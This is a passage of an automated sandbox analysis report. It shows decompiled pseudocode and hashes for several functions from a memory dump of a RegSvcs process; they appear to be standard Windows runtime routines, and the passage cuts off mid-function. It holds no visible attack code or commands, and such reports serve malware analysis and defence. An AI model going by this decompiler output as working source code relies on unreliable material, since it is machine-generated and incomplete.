Instruction ID: 2703748aa2f2c83ba973cf649a39cf2088a6d456ab44c85ebd857507f6dc094b
Opcode Fuzzy Hash: 8f577c51c48e044944cd22cc0c7d6810236966d6c7108050e79e09868ad7166f
Instruction Fuzzy Hash: B531AEF1668204AFC725CB18DCA1F6EB7F9EB95710F24895AE019C7250EF709901CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00A761A0 Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E00A761A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E00A75E50(0xa267cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E00B19D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E00A4F7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}

0x00a761b3
0x00a761b5
0x00a761bd
0x00a761c3
0x00a761c7
0x00a761d2
0x00a761ff
0x00a761ff
0x00a76201
0x00a76207
0x00a76207
0x00a761d4
0x00a761d9
0x00000000
0x00000000
0x00a761df
0x00a761e2
0x00000000
0x00000000
0x00a761e6
0x00a761e8
0x00a761ee
0x00a761ee
0x00a761f9
0x00ab762f
0x00ab7632
0x00ab7635
0x00ab7639
0x00ab7640
0x00ab766e
0x00ab7675
0x00000000
0x00000000
0x00ab7681
0x00ab7689
0x00ab768d
0x00ab7691
0x00ab7695
0x00ab7699
0x00ab76af
0x00ab76b5
0x00ab76b7
0x00ab76b7
0x00ab76d7
0x00ab76dc
0x00000000
0x00ab76dc
0x00ab76a2
0x00ab76a9
0x00ab7651
0x00ab7653
0x00ab7653
0x00ab7656
0x00ab7656
0x00000000
0x00ab7656
0x00ab7644
0x00ab7646
0x00ab7648
0x00ab7648
0x00000000
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d09033f12499b77d8a1257232533bb24f64606b9a42a77a6ee2d483c5bad18d
Instruction ID: 6856024e6b3f48c5b1cf4a562b4a2e881f114404562919e3550cdb80b4b963e4
Opcode Fuzzy Hash: 5d09033f12499b77d8a1257232533bb24f64606b9a42a77a6ee2d483c5bad18d
Instruction Fuzzy Hash: 14318F71609B018FD360CF19C914BAAB7E9FB88B00F55896DF89997352E7B0ED04CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A4AA16 Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00A4AA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0xb3d360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0xb37b9c; // 0x0
					_t53 = L00A64620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E00A8B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E00A8F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L00A56C59(_t53, _t51, _t58) != 0) {
							_t28 = E00A75E50(0xa2c338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E00A7B230(_v32, _v28, 0xa2c2d8, 1,  &_v24);
								_t28 = E00A4F7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}

0x00a4aa25
0x00a4aa29
0x00a4aa2d
0x00a4aa30
0x00a4aa37
0x00a4aa3c
0x00aa4458
0x00aa4458
0x00aa4472
0x00aa4474
0x00aa4476
0x00a4aa64
0x00a4aa74
0x00aa447c
0x00aa4483
0x00aa4492
0x00a4aa52
0x00a4aa54
0x00a4aa5e
0x00aa44a8
0x00aa44ad
0x00aa44af
0x00aa44b6
0x00aa44b6
0x00aa44b9
0x00aa44bc
0x00aa44cd
0x00aa44d3
0x00aa44d6
0x00aa44e1
0x00aa44e1
0x00aa44e6
0x00aa44e8
0x00aa44fb
0x00aa44fb
0x00aa44e8
0x00000000
0x00a4aa5e
0x00aa4476
0x00a4aa42
0x00a4aa46
0x00a4aa48
0x00a4aa4c
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 519bbed78bff3bf6ca1dfef569f8a7d273bb8f484b3c226fc8df041f8a5ee5cd
Instruction ID: ebf651fab336d358810499b9dbc737050fff484e85de8155eadb2cbd7d135e31
Opcode Fuzzy Hash: 519bbed78bff3bf6ca1dfef569f8a7d273bb8f484b3c226fc8df041f8a5ee5cd
Instruction Fuzzy Hash: 5531C371A00219ABCB10AF64CE82ABFB7B9FF48700F114469F805EB191EB749D11DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A84A2C Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00A84A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0xb3d360 ^ _t62;
				_v8 =  *0xb3d360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E00A62280(_t26, 0xb38608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E00A5FFB0(_t41, _t51, 0xb38608);
						L2:
						 *0xb3b1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E00A8B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E00A62280(_t28, 0xb38608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E00A5FFB0(_t42, _t53, 0xb38608);
							if(_t53 != 0) {
								L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E00A5FFB0(_t41, _t51, 0xb38608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}

0x00a84a2c
0x00a84a34
0x00a84a3c
0x00a84a3e
0x00a84a48
0x00a84a4b
0x00a84a4d
0x00a84a51
0x00a84a9c
0x00000000
0x00000000
0x00a84aa3
0x00a84aa8
0x00a84aad
0x00a84ab1
0x00a84ade
0x00a84ae3
0x00a84a5a
0x00a84a62
0x00a84a6a
0x00a84a6e
0x00abf203
0x00a84a84
0x00a84a88
0x00a84a89
0x00a84a8a
0x00a84a95
0x00a84a95
0x00a84a79
0x00a84a80
0x00a84af2
0x00a84af4
0x00a84af9
0x00a84aff
0x00a84b01
0x00a84b03
0x00a84b08
0x00abf20a
0x00abf212
0x00abf216
0x00abf216
0x00a84b08
0x00a84b13
0x00a84b1a
0x00abf229
0x00abf229
0x00a84b1a
0x00a84a82
0x00000000
0x00a84a82
0x00a84ab7
0x00a84acd
0x00a84acd
0x00a84ad5
0x00a84ada
0x00000000
0x00a84ada
0x00a84ac2
0x00a84acb
0x00000000
0x00000000
0x00000000
0x00a84acb
0x00a84a53
0x00a84a53
0x00a84a58
0x00000000

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59f90ef194f4fb021edf94dbbf03d1cd9ab33988d0119e7891b1f5f3df722b3c
Instruction ID: 384609b0e54ea79138cb3b40f2c3048e7f47de066023527a09df1fdcaffa6e91
Opcode Fuzzy Hash: 59f90ef194f4fb021edf94dbbf03d1cd9ab33988d0119e7891b1f5f3df722b3c
Instruction Fuzzy Hash: E43121322457129FC721AF64CA86B6AFBE4FF88B50F244469F8560B691CB74DC04CB86

Uniqueness

Uniqueness Score: -1.00%

Function 00A88EC7 Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00A88EC7(void* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				char _v156;
				intOrPtr _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0xb3d360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E00A74E70(0xb386e4, 0xa89490, 0, 0);
					if( *0xb353e8 > 5 && E00A88F33(0xb353e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0xb353e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0xb353e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0xa2bc46;
						_t48 = E00AC7B9C(0xb353e8, 0xa2bc46, _t67, 0xb353e8, _t70,  &_v140);
					}
				}
				return E00A8B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}

0x00a88ec7
0x00a88ed9
0x00a88edc
0x00a88ee6
0x00a88ee9
0x00a88eee
0x00a88efc
0x00a88f08
0x00ac1349
0x00ac1353
0x00ac135d
0x00ac1366
0x00ac136f
0x00ac1375
0x00ac137c
0x00ac1385
0x00ac1390
0x00ac1391
0x00ac139c
0x00ac139d
0x00ac13a6
0x00ac13ac
0x00ac13b2
0x00ac13b5
0x00ac13bc
0x00ac13bf
0x00ac13c2
0x00ac13c5
0x00ac13c8
0x00ac13cb
0x00ac13ce
0x00ac13d1
0x00ac13d4
0x00ac13d7
0x00ac13da
0x00ac13dd
0x00ac13e0
0x00ac13e3
0x00ac13e6
0x00ac13e9
0x00ac13f6
0x00ac1400
0x00ac1400
0x00a88f08
0x00a88f32

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a2cddf5ac577622a5f075af72aaeb5407a09585e6c22beb6d92e1a0c3bd250a
Instruction ID: 82c0bbadbc754f028311c43b12d31b94b23fa18acbb091f6b80d13475b03eef1
Opcode Fuzzy Hash: 6a2cddf5ac577622a5f075af72aaeb5407a09585e6c22beb6d92e1a0c3bd250a
Instruction Fuzzy Hash: C341AFB1D003189FDB20DFAAD981AADFBF4FB48310F5081AEE519A7241EB745A84CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00A7E730 Relevance: .1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E00A7E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E00A89670() < 0) {
					L00A9DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0xb37b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L00A64620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M00A7E810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

0x00a7e730
0x00a7e736
0x00a7e738
0x00a7e73d
0x00a7e73e
0x00a7e740
0x00a7e749
0x00a7e765
0x00a7e76a
0x00a7e76b
0x00a7e76c
0x00a7e76d
0x00a7e76e
0x00a7e76f
0x00a7e775
0x00a7e777
0x00a7e77e
0x00abb675
0x00a7e784
0x00a7e784
0x00a7e789
0x00a7e7a8
0x00a7e7ac
0x00a7e807
0x00a7e7ae
0x00a7e7ae
0x00a7e7b1
0x00a7e7b4
0x00a7e7b9
0x00a7e7c0
0x00a7e7c4
0x00a7e7ca
0x00a7e7cc
0x00000000
0x00a7e7d3
0x00a7e7d6
0x00000000
0x00000000
0x00a7e7ff
0x00a7e802
0x00000000
0x00000000
0x00a7e7f9
0x00a7e7fc
0x00000000
0x00000000
0x00a7e7f3
0x00a7e7f6
0x00000000
0x00000000
0x00a7e7ed
0x00a7e7f0
0x00000000
0x00000000
0x00a7e7e7
0x00a7e7ea
0x00000000
0x00000000
0x00abb685
0x00abb688
0x00000000
0x00000000
0x00abb682
0x00000000
0x00000000
0x00a7e7cc
0x00a7e7d9
0x00a7e7dc
0x00a7e7de
0x00a7e7de
0x00a7e7ac
0x00a7e7e4
0x00a7e74b
0x00a7e751
0x00a7e759
0x00a7e761
0x00a7e761

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adfa6f1ae7a4cb8fd3bbc52e2d0df97e2a3b0197de3e1e20cb59abe8a1768097
Instruction ID: b8d775f353b294169623a108e88e5ac9366dfdb2a3c51684c3dcdb51d7b8d272
Opcode Fuzzy Hash: adfa6f1ae7a4cb8fd3bbc52e2d0df97e2a3b0197de3e1e20cb59abe8a1768097
Instruction Fuzzy Hash: F5316D75A14249AFD744CF58D941B9AB7F8FB09314F14C2A6F918CB341E631ED80CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A7BC2C Relevance: .1, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00A7BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0xb36100; // 0x5
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E00A62280(0xd, 0x380f1a0);
				_t41 =  *0xb360f8; // 0x0
				if(_t41 != 0) {
					 *0xb360f8 =  *_t41;
					 *0xb360fc =  *0xb360fc + 0xffff;
				}
				E00A5FFB0(_t41, 0x800, 0x380f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0xb360f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L00A64620(0xb36100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0xb36100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}

0x00a7bc36
0x00a7bc42
0x00a7bc45
0x00a7bc4a
0x00a7bd35
0x00000000
0x00000000
0x00000000
0x00000000
0x00a7bc50
0x00a7bc50
0x00a7bc58
0x00a7bc5a
0x00a7bc60
0x00000000
0x00000000
0x00aba4f2
0x00aba4f6
0x00000000
0x00000000
0x00000000
0x00aba4fc
0x00a7bc79
0x00a7bc7e
0x00a7bc86
0x00a7bd16
0x00a7bd20
0x00a7bd20
0x00a7bc8d
0x00a7bc94
0x00a7bcbd
0x00a7bcca
0x00a7bccb
0x00a7bccc
0x00a7bccd
0x00a7bcce
0x00a7bcd4
0x00a7bcea
0x00a7bcee
0x00a7bcf2
0x00a7bd00
0x00a7bd04
0x00000000
0x00a7bc96
0x00a7bcab
0x00a7bcaf
0x00a7bd2c
0x00a7bd2c
0x00a7bd09
0x00000000
0x00a7bd09
0x00a7bcb1
0x00a7bcb5
0x00a7bcbb
0x00000000
0x00000000
0x00000000
0x00a7bcbb

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de823ce0ecf6938e241ae921f201b176be50838cbe028e3fbf39b302faa5eed6
Instruction ID: bda3c1cc891b3bb5d24d0c3794587bca445bf5d3aaa92e351317dfa8e9cc3b34
Opcode Fuzzy Hash: de823ce0ecf6938e241ae921f201b176be50838cbe028e3fbf39b302faa5eed6
Instruction Fuzzy Hash: 9E31BFB6A10615ABCB11DF58D8C1BAA73B4EB19311F25C079ED48DB242EB74DD058BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A49100 Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00A49100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0xb1f6e8);
				E00A9D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E00B188F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E00A9D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0xb386c0; // 0x5207b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0xb386b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E00A62280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E00B188F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E00A8AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0xb3b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0xb384c0;
										if(_t69 >=  *0xb384c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E00B19063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E00A4922A(_t82);
							_t53 = E00A67D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E00B18B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0xb386c0; // 0x5207b0
								if(__eflags != 0) {
